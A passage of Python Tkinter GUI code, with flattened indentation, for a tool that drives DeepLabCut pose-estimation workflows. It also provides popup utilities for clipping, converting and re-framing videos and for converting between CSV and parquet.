tab_parent.add(tab3, text=f'{"[ Add videos into project ]": ^20s}')
tab_parent.add(tab4, text=f'{"[ Extract / label frames ]": ^20s}')
tab_parent.add(tab7, text=f'{"[ Generate training set ]": ^20s}')
tab_parent.add(tab10, text=f'{"[ Video analysis ]": ^20s}')
tab_parent.add(tab13, text=f'{"[ Extract outliers ]": ^20s}')
tab_parent.grid(row=0)
#Load Model : configpath
labelframe_loadmodel = LabelFrame(tab1, text='Load Model', font=("Helvetica",12,'bold'),padx=5,pady=5)
self.label_set_configpath = FileSelect(labelframe_loadmodel, 'DLC config path (.yaml): ',title='Select a .yaml file')
# generate yaml file
label_generatetempyaml = LabelFrame(tab2,text='Generate Temp yaml (for extracting frames from subset of videos)', font=("Helvetica",12,'bold') ,padx=5,pady=5)
label_tempyamlsingle = LabelFrame(label_generatetempyaml,text='Single video',padx=5,pady=5)
self.label_genyamlsinglevideo = FileSelect(label_tempyamlsingle,'Select video:',title='Select a video file')
button_generatetempyaml_single = Button(label_tempyamlsingle,text='Add single video',command=lambda:generatetempyaml(self.label_set_configpath.file_path,self.label_genyamlsinglevideo.file_path))
label_tempyamlmulti =LabelFrame(label_generatetempyaml,text='Multiple videos',padx=5,pady=5)
self.label_genyamlmultivideo = FolderSelect(label_tempyamlmulti,'Select video folder:',title='Select video folder')
button_generatetempyaml_multi = Button(label_tempyamlmulti,text='Add multiple videos',command=self.generateyamlmulti)
label_tempyml = Label(label_generatetempyaml,text='Note: After creating the temp yaml with the selected videos, load the temp.yaml file in "Load Model".',font=('Times',10,'italic'))
label_tempyml2 = Label(label_generatetempyaml,text=' Then, you can proceed to extract frames.',font=('Times',10,'italic'))
#singlevid multivid
labelframe_singlemultivid = LabelFrame(tab3,text='Add Videos into project',font=("Helvetica",12,'bold'),padx=5,pady=5)
labelframe_singlevid = LabelFrame(labelframe_singlemultivid,text='Single Video',padx=5,pady=5)
labelframe_multivid = LabelFrame(labelframe_singlemultivid,text='Multiple Videos',padx=5,pady=5)
self.label_set_singlevid = FileSelect(labelframe_singlevid, 'Select Single Video: ',title='Select a video file')
self.label_video_folder = FolderSelect(labelframe_multivid, 'Select Folder with videos:',title='Select video folder')
button_add_single_video = Button(labelframe_singlevid,text='Add single video',command = self.dlc_addsinglevideo,fg='red')
button_add_multi_video = Button(labelframe_multivid,text='Add multiple videos',command = self.dlc_addmultivideo_command,fg='red')
###########extract frames########
label_extractframes = LabelFrame(tab4, text='Extract Frames DLC', font=("Helvetica",12,'bold'),padx=15,pady=5)
# mode
self.label_numframes2pick = Entry_Box(label_extractframes,'numframes2pick:','26')
label_mode = Label(label_extractframes, text='Mode', font="Verdana 10 underline")
self.mode = IntVar()
checkbox_auto = Radiobutton(label_extractframes, text="Automatic", variable=self.mode, value=1)
checkbox_manual = Radiobutton(label_extractframes, text="Manual", variable=self.mode, value=2)
# algorithm
label_algo = Label(label_extractframes, text='Algorithm ', font="Verdana 10 underline")
self.algo = IntVar()
checkbox_uniform = Radiobutton(label_extractframes, text="Uniform", variable=self.algo, value=1)
checkbox_kmean = Radiobutton(label_extractframes, text="KMeans", variable=self.algo, value=2)
# cluster resize width
self.label_clusterresize = Entry_Box(label_extractframes, 'Cluster Resize Width (Default = 30)', '26')
# cluster step
self.label_clusterstep = Entry_Box(label_extractframes, 'Cluster Step (Default = 1)', '26')
# cluster color
label_clustercolor = Label(label_extractframes, text='Cluster color', font="Verdana 10 underline")
# checkbox cluster color
self.var_clustercolor = IntVar()
checkbox_clustercolor = Checkbutton(label_extractframes, text='True', variable=self.var_clustercolor)
# use opencv
label_useopencv = Label(label_extractframes, text='Use OpenCV', font="Verdana 10 underline")
# checkbox use opencv or not
self.var_useopencv = IntVar()
checkbox_useopencv = Checkbutton(label_extractframes, text='True', variable=self.var_useopencv)
# extractframecommand
button_extractframe = Button(label_extractframes, text='Extract Frames', command=self.dlc_extractframes_command)
##########label Frames#####
label_labelframes = LabelFrame(tab4, text='Label Frames', font=("Helvetica",12,'bold'),padx=15,pady=5)
self.button_label_frames = Button(label_labelframes, text='Label Frames', command=self.dlc_label_frames_command)
##########Check Labels#####
label_checklabels = LabelFrame(tab4, text='Check Labels', font=("Helvetica",12,'bold'),padx=15,pady=5)
self.button_check_labels = Button(label_checklabels, text='Check Labelled Frames', command=self.dlc_check_labels_command)
####generate training sets#####
label_generate_trainingsets = LabelFrame(tab7,text='Generate Training Set',font =("Helvetica",12,'bold'),padx=15,pady=5)
self.button_generate_trainingsets = Button(label_generate_trainingsets, text='Generate training set',command=self.dlc_generate_trainingsets_command)
#####train network####
label_train_network = LabelFrame(tab7,text= 'Train Network',font =("Helvetica",12,'bold'),padx=15,pady=5)
self.label_iteration = Entry_Box(label_train_network,'iteration','10')
self.button_update_iteration = Button(label_train_network,text='Update iteration',command =lambda:updateiteration(self.label_set_configpath.file_path,self.label_iteration.entry_get))
self.init_weight = FileSelect(label_train_network,'init_weight ',title='Select training weight, eg: .DATA-00000-OF-00001 File')
self.update_init_weight = Button(label_train_network,text='Update init_weight',command=lambda:update_init_weight(self.label_set_configpath.file_path,self.init_weight.file_path))
self.button_train_network = Button(label_train_network, text='Train Network',command=self.dlc_train_network_command)
#######evaluate network####
label_eva_network = LabelFrame(tab7,text='Evaluate Network',font = ("Helvetica",12,'bold'),padx=15,pady=5)
self.button_evaluate_network = Button(label_eva_network, text='Evaluate Network',command=self.dlc_evaluate_network_command)
#####video analysis####
label_video_analysis = LabelFrame(tab10,text='Video Analysis',font=("Helvetica",12,'bold'),padx=15,pady=5)
#singlevideoanalysis
label_singlevideoanalysis = LabelFrame(label_video_analysis,text='Single Video Analysis',pady=5,padx=5)
self.videoanalysispath = FileSelect(label_singlevideoanalysis, "Video path",title='Select a video file')
button_vidanalysis = Button(label_singlevideoanalysis, text='Single Video Analysis', command=self.dlc_video_analysis_command1)
#multi video analysis
label_multivideoanalysis = LabelFrame(label_video_analysis,text='Multiple Videos Analysis',pady=5,padx=5)
self.videofolderpath = FolderSelect(label_multivideoanalysis,'Folder Path',title='Select video folder')
self.video_type = Entry_Box(label_multivideoanalysis,'Video type(eg:mp4,avi):','18')
button_multivideoanalysis = Button(label_multivideoanalysis,text='Multi Videos Analysis',command=self.dlc_video_analysis_command2)
#### plot####
label_plot = LabelFrame(tab10,text='Plot Video Graph',font=("Helvetica",12,'bold'),padx=15,pady=5)
# videopath
self.videoplotpath = FileSelect(label_plot, "Video path",title='Select a video file')
# plot button
button_plot = Button(label_plot, text='Plot Results', command=self.dlc_plot_videoresults_command)
#####create video####
label_createvideo = LabelFrame(tab10,text='Create Video',font=("Helvetica",12,'bold'),padx=15,pady=5)
# videopath
self.createvidpath = FileSelect(label_createvideo, "Video path",title='Select a video file')
# save frames
self.var_saveframes = IntVar()
checkbox_saveframes = Checkbutton(label_createvideo, text='Save Frames', variable=self.var_saveframes)
# create video button
button_createvideo = Button(label_createvideo, text='Create Video', command=self.dlc_create_video_command)
######Extract Outliers####
label_extractoutlier = LabelFrame(tab13,text='Extract Outliers',font=("Helvetica",12,'bold'),pady=5,padx=5)
self.label_extractoutliersvideo = FileSelect(label_extractoutlier,'Videos to correct:',title='Select a video file')
button_extractoutliers = Button(label_extractoutlier,text='Extract Outliers',command =lambda:deeplabcut.extract_outlier_frames(self.label_set_configpath.file_path, [str(self.label_extractoutliersvideo.file_path)],automatic=True) )
####label outliers###
label_labeloutliers = LabelFrame(tab13,text='Label Outliers',font =("Helvetica",12,'bold'),pady=5,padx=5)
button_refinelabels = Button(label_labeloutliers,text='Refine Outliers',command=lambda:deeplabcut.refine_labels(self.label_set_configpath.file_path))
####merge labeled outliers ###
label_mergeoutliers = LabelFrame(tab13,text='Merge Labelled Outliers',font=("Helvetica",12,'bold'),pady=5,padx=5)
button_mergelabeledoutlier = Button(label_mergeoutliers,text='Merge Labelled Outliers',command=lambda:deeplabcut.merge_datasets(self.label_set_configpath.file_path))
#organize
labelframe_loadmodel.grid(row=0,sticky=W,pady=5)
self.label_set_configpath.grid(row=0,sticky=W)
label_generatetempyaml.grid(row=1,sticky=W)
label_tempyamlsingle.grid(row=0,sticky=W)
self.label_genyamlsinglevideo.grid(row=0,sticky=W)
button_generatetempyaml_single.grid(row=1,sticky=W)
label_tempyamlmulti.grid(row=1,sticky=W)
self.label_genyamlmultivideo.grid(row=0,sticky=W)
button_generatetempyaml_multi.grid(row=1,sticky=W)
label_tempyml.grid(row=2,sticky=W)
label_tempyml2.grid(row=3, sticky=W)
labelframe_singlemultivid.grid(row=2,sticky=W,pady=5)
labelframe_singlevid.grid(row=0,sticky=W)
self.label_set_singlevid.grid(row=0,sticky=W)
button_add_single_video.grid(row=1,sticky=W)
labelframe_multivid.grid(row=1,sticky=W)
self.label_video_folder.grid(row=0,sticky=W)
button_add_multi_video.grid(row=1,sticky=W)
label_extractframes.grid(row=3,column=0, sticky=W,pady=5,padx=5)
self.label_numframes2pick.grid(row=0,sticky=W)
label_mode.grid(row=1, sticky=W)
checkbox_auto.grid(row=2, sticky=W)
checkbox_manual.grid(row=3, sticky=W)
label_algo.grid(row=4, sticky=W)
checkbox_uniform.grid(row=5, sticky=W)
checkbox_kmean.grid(row=6, sticky=W)
self.label_clusterresize.grid(row=7, sticky=W)
self.label_clusterstep.grid(row=8, sticky=W)
label_clustercolor.grid(row=9, sticky=W)
checkbox_clustercolor.grid(row=10, sticky=W)
label_useopencv.grid(row=11, sticky=W)
checkbox_useopencv.grid(row=12, sticky=W)
button_extractframe.grid(row=13,sticky=W)
label_labelframes.grid(row=3,column=1,sticky=W+N,pady=5,padx=5)
self.button_label_frames.grid(row=0,sticky=W)
label_checklabels.grid(row=3,column=2,sticky=W+N,pady=5,padx=5)
self.button_check_labels.grid(row=0,sticky=W)
label_generate_trainingsets.grid(row=6,sticky=W,pady=5)
self.button_generate_trainingsets.grid(row=0,sticky=W)
label_train_network.grid(row=7,sticky=W,pady=5)
self.label_iteration.grid(row=0,column=0,sticky=W)
self.button_update_iteration.grid(row=0,column=1,sticky=W)
self.init_weight.grid(row=1,column=0,sticky=W)
self.update_init_weight.grid(row=1,column=1,sticky=W)
self.button_train_network.grid(row=2,sticky=W)
label_eva_network.grid(row=8,sticky=W,pady=5)
self.button_evaluate_network.grid(row=0,sticky=W)
#video analysis
label_video_analysis.grid(row=9,sticky=W,pady=5)
label_singlevideoanalysis.grid(row=0,sticky=W,pady=5)
label_multivideoanalysis.grid(row=1,sticky=W,pady=5)
self.videoanalysispath.grid(row=0,sticky=W)
button_vidanalysis.grid(row=2,sticky=W)
self.videofolderpath.grid(row=3,sticky=W,pady=5)
self.video_type.grid(row=4,sticky=W)
button_multivideoanalysis.grid(row=5,sticky=W)
label_plot.grid(row=10,sticky=W,pady=5)
self.videoplotpath.grid(row=0,sticky=W)
button_plot.grid(row=1,sticky=W)
label_createvideo.grid(row=11,sticky=W,pady=5)
self.createvidpath.grid(row=0,sticky=W)
checkbox_saveframes.grid(row=1,sticky=W)
button_createvideo.grid(row=2,sticky=W)
label_extractoutlier.grid(row=12,sticky=W,pady=5)
self.label_extractoutliersvideo.grid(row=0,sticky=W)
button_extractoutliers.grid(row=1,sticky=W)
label_labeloutliers.grid(row=13,sticky=W,pady=5)
button_refinelabels.grid(row=0,sticky=W)
label_mergeoutliers.grid(row=14,sticky=W,pady=5)
button_mergelabeledoutlier.grid(row=0,sticky=W)
def dlc_addsinglevideo(self):
try:
deeplabcut.add_new_videos(self.label_set_configpath.file_path, [str(self.label_set_singlevid.file_path)],copy_videos=True)
except FileNotFoundError:
print('...')
print('Fail to add video, please load .yaml file and select video file')
def generateyamlmulti(self):
try:
config_path = self.label_set_configpath.file_path
directory = self.label_genyamlmultivideo.folder_path
filesFound = []
########### FIND FILES ###########
for i in os.listdir(directory):
if '.avi' or '.mp4' in i:
a = os.path.join(directory, i)
filesFound.append(a)
print(a)
print(filesFound)
generatetempyaml_multi(config_path,filesFound)
except FileNotFoundError:
print('Fail to add videos, please load .yaml file and select video folder')
def dlc_addmultivideo_command(self):
try:
config_path = self.label_set_configpath.file_path
directory = self.label_video_folder.folder_path
filesFound = []
########### FIND FILES ###########
for i in os.listdir(directory):
if 'avi' or '.mp4' in i:
a = os.path.join(directory, i)
deeplabcut.add_new_videos(config_path, [str(a)], copy_videos=True)
print("Videos added.")
except FileNotFoundError:
print('Fail to add videos, please load .yaml file and select video folder')
def dlc_extractframes_command(self):
config_path = self.label_set_configpath.file_path
select_numfram2pick(config_path,self.label_numframes2pick.entry_get)
if self.mode.get()==1:
modes = str('automatic')
elif self.mode.get()==2:
modes = str('manual')
if self.algo.get()==1:
algorithm = str('uniform')
elif self.algo.get()==2:
algorithm = str('kmeans')
if len(self.label_clusterresize.entry_get)==0:
clusterresizewidth = int(30)
else:
clusterresizewidth = int(self.label_clusterresize.entry_get)
if len(self.label_clusterstep.entry_get)==0:
clusterstep = int(1)
else:
clusterstep = int(self.label_clusterstep.entry_get)
if self.var_clustercolor.get()==1:
clustercolor = True
else:
clustercolor = False
if self.var_useopencv.get()==1:
useopencv = True
else:
useopencv = False
try:
print(config_path,modes,algorithm,clusterstep,clusterresizewidth,clustercolor,useopencv)
deeplabcut.extract_frames(config_path,mode=modes,algo=algorithm,crop=False,userfeedback=False,cluster_step=clusterstep,cluster_resizewidth=clusterresizewidth,cluster_color=clustercolor,opencv=useopencv)
except:
print('Fail to extract frames, please make sure all the information is filled in')
def dlc_label_frames_command(self):
config_path = self.label_set_configpath.file_path
deeplabcut.label_frames(config_path)
def dlc_check_labels_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.check_labels(config_path)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_generate_trainingsets_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.create_training_dataset(config_path, num_shuffles=1)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_train_network_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.train_network(config_path, shuffle=1, gputouse=0)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_evaluate_network_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.evaluate_network(config_path, plotting=True)
except FileNotFoundError:
print('Please load .yaml file to continue')
def dlc_video_analysis_command1(self):
try:
config_path = self.label_set_configpath.file_path
vid_name = os.path.basename(self.videoanalysispath.file_path)
vid_type = vid_name[-4:]
deeplabcut.analyze_videos(config_path, [str(self.videoanalysispath.file_path)], shuffle=1,save_as_csv=True, videotype=vid_type)
except FileNotFoundError:
print('Please load .yaml file and select video path to continue')
def dlc_video_analysis_command2(self):
try:
config_path = self.label_set_configpath.file_path
folder_path = self.videofolderpath.folder_path
vid_type = self.video_type.entry_get
deeplabcut.analyze_videos(config_path, [str(folder_path)], shuffle=1,save_as_csv=True, videotype=vid_type)
except FileNotFoundError:
print('Please load .yaml file and select folder with videos to continue')
def dlc_plot_videoresults_command(self):
try:
config_path = self.label_set_configpath.file_path
deeplabcut.plot_trajectories(config_path, [str(self.videoplotpath.file_path)])
except FileNotFoundError:
print('Please load .yaml file and select a video file to plot graph')
def dlc_create_video_command(self):
try:
config_path = self.label_set_configpath.file_path
if self.var_saveframes==1:
saveframes=True
else:
saveframes=False
vid_name = os.path.basename(self.createvidpath.file_path)
vid_type = vid_name[-4:]
deeplabcut.create_labeled_video(config_path, [str(self.createvidpath.file_path)],save_frames=saveframes, videotype=vid_type)
except FileNotFoundError:
print('Please select .yaml file and select a video to continue.')
class shorten_video:
def __init__(self):
# Popup window
shortenvid = Toplevel()
shortenvid.minsize(200, 200)
shortenvid.wm_title("Clip video")
# videopath
self.videopath1selected = FileSelect(shortenvid, "Video path",title='Select a video file')
#timeframe for start and end cut
label_cutvideomethod1 = LabelFrame(shortenvid,text='Method 1',font='bold',padx=5,pady=5)
label_timeframe = Label(label_cutvideomethod1, text='Please enter the time frame in hh:mm:ss format')
self.label_starttime = Entry_Box(label_cutvideomethod1,'Start at:','8')
self.label_endtime = Entry_Box(label_cutvideomethod1, 'End at:',8)
CreateToolTip(label_cutvideomethod1,
'Method 1 will retrieve the specified time input.(eg: input of Start at: 00:00:00, End at: 00:01:00, will create a new video from the chosen video from the very start till it reaches the first minute of the video)')
#express time frame
label_cutvideomethod2 = LabelFrame(shortenvid,text='Method 2',font='bold',padx=5,pady=5)
label_method2 = Label(label_cutvideomethod2,text='Method 2 will retrieve from the end of the video (e.g.,: an input of 3 seconds will get rid of the first 3 seconds of the video).')
# self.var_express = IntVar()
# checkbox_express = Checkbutton(label_cutvideomethod2, text='Check this box to use Method 2', variable=self.var_express)
self.label_time = Entry_Box(label_cutvideomethod2,'Seconds:','8')
CreateToolTip(label_cutvideomethod2,'Method 2 will retrieve from the end of the video.(eg: an input of 3 seconds will get rid of the first 3 seconds of the video)')
#button to cut video
button_cutvideo1 = Button(label_cutvideomethod1, text='Cut Video', command=lambda:shortenvideos1(self.videopath1selected.file_path,self.label_starttime.entry_get,self.label_endtime.entry_get))
button_cutvideo2 = Button(label_cutvideomethod2,text='Cut Video',command =lambda:shortenvideos2(self.videopath1selected.file_path,self.label_time.entry_get))
#organize
self.videopath1selected.grid(row=0,sticky=W)
label_cutvideomethod1.grid(row=1,sticky=W,pady=5)
label_timeframe.grid(row=0,sticky=W)
self.label_starttime.grid(row=1,sticky=W)
self.label_endtime.grid(row=2,sticky=W)
button_cutvideo1.grid(row=3)
label_cutvideomethod2.grid(row=2,sticky=W,pady=5)
label_method2.grid(row=0,sticky=W)
# checkbox_express.grid(row=1,sticky=W)
self.label_time.grid(row=2,sticky=W)
button_cutvideo2.grid(row=3)
class multi_shorten_video:
def __init__(self):
# Popup window
self.multishort = Toplevel()
self.multishort.minsize(200, 200)
self.multishort.wm_title("Clip video into multiple videos")
self.lblmultishort = LabelFrame(self.multishort, text='Split videos into different parts', font='bold', padx=5, pady=5)
# videopath
self.videopath1selected = FileSelect(self.lblmultishort, "Video path", title='Select a video file')
self.noclips = Entry_Box(self.lblmultishort,'# of clips','8')
confirmclip = Button(self.lblmultishort,text='Confirm',command=lambda:self.expand(self.noclips.entry_get))
runbutton = Button(self.multishort,text='Clip video', command= lambda:splitvideos(self.videopath1selected.file_path,self.allentries),fg='navy',font=("Helvetica",12,'bold'))
#organize
self.lblmultishort.grid(row=0,sticky=W)
self.videopath1selected.grid(row=1,sticky=W,columnspan=2)
self.noclips.grid(row=2,sticky=W)
confirmclip.grid(row=2,column=1,sticky=W)
runbutton.grid(row=5)
def expand(self,noclips):
try:
self.table.destroy()
except:
pass
noclips = int(noclips)
self.table = LabelFrame(self.multishort)
lbl_clip = Label(self.table,text='Clip #')
lbl_start = Label(self.table,text='Start Time')
lbl_stop = Label(self.table,text='Stop Time')
#organize table
self.table.grid(row=2,sticky=W)
lbl_clip.grid(row=0,column=0,sticky=W)
lbl_start.grid(row=0,column=1)
lbl_stop.grid(row=0,column=2)
#list
self.ent1 = [0] * noclips
self.ent2 = [0] * noclips
self.ent3 = [0] * noclips
for i in range(noclips):
self.ent1[i] = Label(self.table,text='Clip '+str(i+1))
self.ent1[i].grid(row=i+2,sticky=W)
self.ent2[i] = Entry(self.table)
self.ent2[i].grid(row=i+2,column=1,sticky=W)
self.ent3[i] = Entry(self.table)
self.ent3[i].grid(row=i+2,column=2,sticky=W)
self.allentries = [self.ent2,self.ent3]
class change_imageformat:
def __init__(self):
# Popup window
chgimgformat = Toplevel()
chgimgformat.minsize(200, 200)
chgimgformat.wm_title("Change image format")
#select directory
self.folderpath1selected = FolderSelect(chgimgformat,"Image directory",title='Select folder with images')
#change image format
label_filetypein = LabelFrame(chgimgformat,text= 'Original image format',font=("Helvetica",12,'bold'),padx=15,pady=5)
# Checkbox input
self.varfiletypein = IntVar()
checkbox_c1 = Radiobutton(label_filetypein, text=".png", variable=self.varfiletypein, value=1)
checkbox_c2 = Radiobutton(label_filetypein, text=".jpeg", variable=self.varfiletypein, value=2)
checkbox_c3 = Radiobutton(label_filetypein, text=".bmp", variable=self.varfiletypein, value=3)
#ouput image format
label_filetypeout = LabelFrame(chgimgformat,text='Output image format',font=("Helvetica",12,'bold'),padx=15,pady=5)
#checkbox output
self.varfiletypeout = IntVar()
checkbox_co1 = Radiobutton(label_filetypeout, text=".png", variable=self.varfiletypeout, value=1)
checkbox_co2 = Radiobutton(label_filetypeout, text=".jpeg", variable=self.varfiletypeout, value=2)
checkbox_co3 = Radiobutton(label_filetypeout, text=".bmp", variable=self.varfiletypeout, value=3)
#button
button_changeimgformat = Button(chgimgformat, text='Convert image file format', command=self.changeimgformatcommand)
#organized
self.folderpath1selected.grid(row=0,column=0)
label_filetypein.grid(row=1,column=0,pady=5)
checkbox_c1.grid(row=2,column=0)
checkbox_c2.grid(row=3,column=0)
checkbox_c3.grid(row=4,column=0)
label_filetypeout.grid(row=5,column=0,pady=5)
checkbox_co1.grid(row=6,column=0)
checkbox_co2.grid(row=7,column=0)
checkbox_co3.grid(row=8, column=0)
button_changeimgformat.grid(row=9,pady=5)
def changeimgformatcommand(self):
if self.varfiletypein.get()==1:
filetypein = str('png')
elif self.varfiletypein.get()==2:
filetypein = str('jpeg')
elif self.varfiletypein.get()==3:
filetypein = str('bmp')
if self.varfiletypeout.get()==1:
filetypeout = str('png')
elif self.varfiletypeout.get()==2:
filetypeout = str('jpeg')
elif self.varfiletypeout.get() == 3:
filetypeout = str('bmp')
cif=changeimageformat(self.folderpath1selected.folder_path, filetypein, filetypeout)
print('Images converted to '+ str(cif) + ' format')
class convert_video:
def __init__(self):
# Popup window
convertvid = Toplevel()
convertvid.minsize(400, 400)
convertvid.wm_title("Convert video format")
#multi video
label_multivideo = LabelFrame(convertvid, text='Convert multiple videos',font=("Helvetica",12,'bold'),padx=5,pady=5)
vid_dir = FolderSelect(label_multivideo,'Video directory',title='Select folder with videos')
ori_format = Entry_Box(label_multivideo,'Input format','12')
final_format = Entry_Box(label_multivideo,'Output format','12')
button_convertmultivid = Button(label_multivideo,text='Convert multiple videos',command = lambda: batch_convert_videoformat(vid_dir.folder_path,ori_format.entry_get,final_format.entry_get))
#single video
label_convert = LabelFrame(convertvid,text='Convert single video',font=("Helvetica",12,'bold'),padx=5,pady=5)
self.videopath1selected = FileSelect(label_convert, "Video path",title='Select a video file')
self.vvformat = IntVar()
checkbox_v1 = Radiobutton(label_convert, text="Convert .avi to .mp4", variable=self.vvformat, value=1)
checkbox_v2 = Radiobutton(label_convert, text="Convert mp4 into Powerpoint supported format", variable=self.vvformat, value=2)
#button
button_convertvid= Button(label_convert, text='Convert video format', command=self.convertavitomp)
#organize
label_multivideo.grid(row=0,sticky=W)
vid_dir.grid(row=0,sticky=W)
ori_format.grid(row=1,sticky=W)
final_format.grid(row=2,sticky=W)
button_convertmultivid.grid(row=3,pady=10)
label_convert.grid(row=1,sticky=W)
self.videopath1selected.grid(row=0,sticky=W)
checkbox_v1.grid(row=1,column=0,sticky=W)
checkbox_v2.grid(row=2,column=0,sticky=W)
button_convertvid.grid(row=3,column=0,pady=10)
def convertavitomp(self):
if self.vvformat.get()== 1:
cavi = convertavitomp4(self.videopath1selected.file_path)
print('Video converted to ' + cavi)
elif self.vvformat.get()== 2:
cavi = convertpowerpoint(self.videopath1selected.file_path)
print('Video converted to ' + cavi)
class extract_specificframes:
def __init__(self):
# Popup window
extractsf = Toplevel()
extractsf.minsize(200, 200)
extractsf.wm_title("Extract defined Frames")
# videopath
self.videopath1selected = FileSelect(extractsf, "Video path",title='Select a video file')
#entry boxes for frames to extract
label_frametitle = LabelFrame(extractsf, text='Frames to be extracted',padx=5,pady=5)
self.label_startframe1 = Entry_Box(label_frametitle,'Start Frame:','10')
self.label_endframe1 = Entry_Box(label_frametitle, 'End Frame:','10')
#button
button_extractsf = Button(label_frametitle, text='Extract Frames', command=self.extractsfcommand)
#organize
self.videopath1selected.grid(row=0,column=0,sticky=W,pady=10)
label_frametitle.grid(row=1,column=0,sticky=W)
self.label_startframe1.grid(row=2,column=0,sticky=W)
self.label_endframe1.grid(row=3,column=0,sticky=W)
button_extractsf.grid(row=4,pady=5)
def extractsfcommand(self):
startframe1 = self.label_startframe1.entry_get
endframe1 = self.label_endframe1.entry_get
extractspecificframe(self.videopath1selected.file_path, startframe1, endframe1)
print('Frames were extracted from '+ str(startframe1)+' to ' + endframe1)
def extract_allframes():
# Popup window
extractaf = Toplevel()
extractaf.minsize(300, 300)
extractaf.wm_title("Extract all frames")
#single video
singlelabel = LabelFrame(extractaf,text='Single video',padx=5,pady=5,font='bold')
# videopath
videopath = FileSelect(singlelabel, "Video path",title='Select a video file')
#button
button_extractaf = Button(singlelabel, text='Extract Frames (Single video)', command= lambda:extract_allframescommand(videopath.file_path))
#multivideo
multilabel = LabelFrame(extractaf,text='Multiple videos',padx=5,pady=5,font='bold')
folderpath = FolderSelect(multilabel,'Folder path',title=' Select video folder')
button_extractmulti = Button(multilabel,text='Extract Frames (Multiple videos)',command=lambda:batch_extract_allframes(folderpath.folder_path))
#organize
singlelabel.grid(row=0,sticky=W,pady=10)
videopath.grid(row=0,sticky=W)
button_extractaf.grid(row=1,sticky=W,pady=10)
multilabel.grid(row=1,sticky=W,pady=10)
folderpath.grid(row=0,sticky=W)
button_extractmulti.grid(row=1,sticky=W,pady=10)
def CSV2parquet():
csv2parq = Toplevel()
csv2parq.minsize(300, 300)
csv2parq.wm_title("Convert CSV directory to parquet")
multilabel = LabelFrame(csv2parq, text='Select CSV directory', padx=5, pady=5, font='bold')
folderpath = FolderSelect(multilabel, 'CSV folder path', title=' Select CSV folder')
button_extractmulti = Button(multilabel, text='Convert CSV to parquet', command=lambda: convert_csv_to_parquet(folderpath.folder_path))
multilabel.grid(row=1, sticky=W, pady=10)
folderpath.grid(row=0, sticky=W)
button_extractmulti.grid(row=1, sticky=W, pady=10)
def parquet2CSV():
parq2csv = Toplevel()
parq2csv.minsize(300, 300)
parq2csv.wm_title("Convert parquet directory to CSV")
multilabel = LabelFrame(parq2csv, text='Select parquet directory', padx=5, pady=5, font='bold')
folderpath = FolderSelect(multilabel, 'Parquet folder path', title=' Select parquet folder')
button_extractmulti = Button(multilabel, text='Convert parquet to CSV', command=lambda: convert_parquet_to_csv(folderpath.folder_path))
multilabel.grid(row=1, sticky=W, pady=10)
folderpath.grid(row=0, sticky=W)
button_extractmulti.grid(row=1, sticky=W, pady=10)
class multicropmenu:
def __init__(self):
multimenu = Toplevel()
multimenu.minsize(300, 300)
multimenu.wm_title("Multi Crop")
self.inputfolder = FolderSelect(multimenu,"Video Folder ")
self.outputfolder = FolderSelect(multimenu,"Output Folder")
self.videotype = Entry_Box(multimenu,"Video type","10")
self.croptimes = Entry_Box(multimenu,"# of crops","10")
button_multicrop = Button(multimenu,text='Crop',command=lambda:multicrop(self.videotype.entry_get,self.inputfolder.folder_path,self.outputfolder.folder_path,self.croptimes.entry_get))
#organize
self.inputfolder.grid(row=0,sticky=W,pady=2)
self.outputfolder.grid(row=1,sticky=W,pady=2)
self.videotype.grid(row=2,sticky=W,pady=2)
self.croptimes.grid(row=3,sticky=W,pady=2)
button_multicrop.grid(row=4,pady=10)
class changefps:
def __init__(self):
fpsmenu = Toplevel()
fpsmenu.minsize(200, 200)
fpsmenu.wm_title("Change frame rate of video")
# videopath
videopath = FileSelect(fpsmenu, "Video path",title='Select a video file')
#fps
label_fps= Entry_Box(fpsmenu,'Output fps','10')
#button
button_fps = Button(fpsmenu,text='Convert',command=lambda:changefps_singlevideo(videopath.file_path,label_fps.entry_get))
#organize
videopath.grid(row=0,sticky=W)
label_fps.grid(row=1,sticky=W)
button_fps.grid(row=2)
class changefpsmulti:
def __init__(self):
multifpsmenu = Toplevel()
multifpsmenu.minsize(400, 200)
multifpsmenu.wm_title("Change frame rate of videos in a folder")
# videopath
videopath = FolderSelect(multifpsmenu, "Folder path", title='Select folder with videos')
# fps
label_fps = Entry_Box(multifpsmenu, 'Output fps', '10')
# button
button_fps = Button(multifpsmenu, text='Convert',
command=lambda: changefps_multivideo(videopath.folder_path, label_fps.entry_get))
# organize
videopath.grid(row=0, sticky=W)
label_fps.grid(row=1, sticky=W)
button_fps.grid(row=2)
class extract_seqframe:
def __init__(self):
extractseqtoplevel = Toplevel()
extractseqtoplevel.minsize(200, 200)
extractseqtoplevel.wm_title("Extract All Frames from Seq files")
# videopath
videopath = FileSelect(extractseqtoplevel, "Video Path",title='Select a video file')
# button
button_extractseqframe = Button(extractseqtoplevel, text='Extract All Frames', command=lambda: extract_seqframescommand(videopath.file_path))
#organize
videopath.grid(row=0)
button_extractseqframe.grid(row=1)
class mergeframeffmpeg:
def __init__(self):
# Popup window
mergeffmpeg = Toplevel()
mergeffmpeg.minsize(250, 250)
mergeffmpeg.wm_title("Merge images to video")
# select directory
self.folderpath1selected = FolderSelect(mergeffmpeg,"Working Directory",title='Select folder with frames')
# settings
label_settings = LabelFrame(mergeffmpeg,text='Settings',padx=5,pady=5)
self.label_imgformat = Entry_Box(label_settings, 'Image format','10')
label_to = Label(label_settings,text=' to ',width=0)
self.label_vidformat = Entry_Box(label_settings,'Video format','10')
self.label_bitrate = Entry_Box(label_settings,'Bitrate','10')
self.label_fps = Entry_Box(label_settings,'fps','10')
#button
button_mergeimg = Button(label_settings, text='Merge Images', command=self.mergeframeffmpegcommand)
#organize
label_settings.grid(row=1,pady=10)
self.folderpath1selected.grid(row=0,column=0,pady=10)
self.label_imgformat.grid(row=1,column=0,sticky=W)
label_to.grid(row=1,column=1)
self.label_vidformat.grid(row=1,column=2,sticky=W)
self.label_fps.grid(row=2,column=0,sticky=W,pady=5)
self.label_bitrate.grid(row=3,column=0,sticky=W,pady=5)
button_mergeimg.grid(row=4,column=1,sticky=E,pady=10)
def mergeframeffmpegcommand(self):
imgformat = self.label_imgformat.entry_get
